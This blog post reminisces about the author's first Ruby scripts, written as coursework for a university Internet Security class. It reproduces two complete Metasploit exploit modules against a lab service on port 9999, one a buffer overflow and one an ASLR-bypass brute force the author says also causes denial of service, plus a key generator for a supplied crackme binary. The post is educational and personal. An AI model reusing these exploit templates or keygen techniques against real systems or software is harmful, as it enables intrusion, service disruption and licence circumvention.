Can you still remember the first program you ever wrote? The first program you ever wrote in your current favorite language? How far you’ve come and how much you’ve learned since then?
I think it’s important to acknowledge this fact and let people know. Often beginners tell me that they can’t really imagine getting from where they are right now in terms of programming skill to where more experienced people are. Therefore, I think it’s important to show where even experienced developers come from, to give some perspective.
I can’t currently locate the code of the first programs I ever wrote. I exactly know (and still have) my first ruby scripts, though. At that time I was already in the third semester of my bachelor and mostly security focussed in my studies. It was January of 2010 and we had a special task to earn bonus points in the Internet Security course by writing two exploits and a key generator. I decided to use these tasks to learn me some ruby – without reading a book about it or anything. The code is heavily commented, as we had to hand it in and that was one of the requirements.
So here goes the code (unmodified, as handed in). I want to share it to shoe people what horrible unruby-ish code I used to write. I want to encourage you to do the same. Maybe tweet it out with #myfirstrubyscript and a link to a gist or so?
Here is the gist for my first couple of ruby scripts, they are probably easier to read over there as my current blog layout is too narrow: Tobi’s first ruby scripts
The first exploit
The firs exploit was for a service on a provided debian system, that was vulnerable to a buffer overflow. We just had the binary and had to go from there.
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # # This exploit affects the debian Linuxmachine from our IS Special task. # include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Istask11', 'Description' => %q{ This explois was made as part of the Internet Security Special Task. }, 'Author' => 'Tobi', 'Version' => '$Revision: 5 $', 'Payload' => { 'Space' => 1540, 'BadChars' => "\x00", }, 'Targets' => [ # Target 0: Linux [ 'Linux', { 'Platform' => 'linux', 'Ret' => 0xbfffef34, 'BufSize' => 1640 # as found out by debugging/boomerang } ], ], 'DefaultTarget' => 0)) #set a default port register_options( [ Opt::RPORT(9999) ], self.class) end # # The exploit method connects to the remote service and sends the payload # followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad # def exploit connect print_status ("Start exploiting the vulnerable debianmachine") # # Build the buffer for transmission # the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves # so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough) # buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00" print_status("Sending #{buf.length} byte data") # Send it off sock.put(buf) sock.get handler end end
The second exploit (ASLR)
This time the target was a gentoo machine I believe (despite what the first comment says), and the special problem was that the machine used ASLR – Address Space Layout Randomization. A technique to prevent buffer overflows as the return address changes. My solution to that is error prone and doesn’t always work, but see for yourselves π
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # # This exploit affects the debian Linuxmachine from our IS Special task. # take note of the description as I couldn't find another way in time. # possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack.... # include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Istask12', 'Description' => %q{ This explois was made as part of the Internet Security Special Task. you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c). }, 'Author' => 'Tobi', 'Version' => '$Revision: 100 $', 'Payload' => { 'Space' => 400, #should be enough for most of the payloads 'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts 'BadChars' => "\x00", }, 'Targets' => [ # Target 0: Linux [ 'Linux', { 'Platform' => 'linux', 'Ret' => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized) 'BufSize' => 1032 # as found out by debugging/boomerang } ], ], 'DefaultTarget' => 0)) #set a default port register_options( [ Opt::RPORT(9999) ], self.class) end # # this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle). # def exploit print_status ("Start exploiting the vulnerable gentoomachine") # # initialization here we determine a couple of important values # return_address = target.ret nops_after_payload = 12 # 4- aligned nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload print_status("nops_before_payload: #{nops_before_payload}") # initialize the constant part of the buffer (for performancereasons) standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload ) # can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so ) payload_offset = 4- payload.encoded.length % 4 # as long as we don't reach a region where our buffer can't be we keep on trying. while (return_address < 0xc0000000) connect buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian) print_status("trying address #{return_address} ") # Send it off sock.put(buf) sock.get handler return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned disconnect end end end
The key generator
The last task was considerably easier than the first two tasks, this time we just had a binary and had to generate keys which this binary would accept. In this code you can see me not using constants, but making up for it with using for loops. And probably lots of other terrible things – didn’t want to look at it too closely π
# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy ## the numbers as taken from the binary, which are used to XOR encrypt the key there encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A] # at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long) # sicne ruby doesn't really support multidimensional arrays out of the box we got # to add an array as an element possencr = Array.new for i in 0..7 do #we're going to temporarily save the found values here temparray = [] for j in 0..255 do keychar = j ^ encryptnumbers[i] # if keychar is printable if ((keychar >= 32) and (keychar <= 126)) temparray << j end end possencr << temparray end # in the resulting array, the first index is also the index of the keys/encryptnumbers # the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out) # note that the numbers are in order (lowest number comes first) # now we try to genereate a key crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum key = Array.new # saves the corresponding keychars sum = 0 for i in 0..4 do #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random crypt[i] = possencr[i][rand(possencr[i].length)] # key is automotically printable due to our awesome array key[i] = crypt[i] ^ encryptnumbers[i] sum+= crypt[i] end # so here will be some magice, we'll use our last 3 chars to adjust the sum in # such a way that it's between 97 and 122. # we're lucky, as I found out our last 3 possible encrypted chars, have no holes # in the array, it's 95 elements each and all consecutive # 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122 offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255) # &255 ---> take the last byte (least significant) if offset <0 offset = 256 + offset end # we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space index = offset/3 # now make the damned last three chars! for i in 5..7 do crypt[i] = possencr[i][index] key[i] = crypt[i] ^ encryptnumbers[i] sum+= crypt[i] end # we just need the last byte sum = sum & 255 key[8] = sum #make them chars (not numbers) for i in 0..8 do key[i]=key[i].chr end # make a string out of the array of chars key = key.to_s # output the key - BAM! puts key
How about you?
What was your first ruby script? Can you still find and share it? If so, please tweet it out with #myfirstrubyscript to show that everyone eventually started small π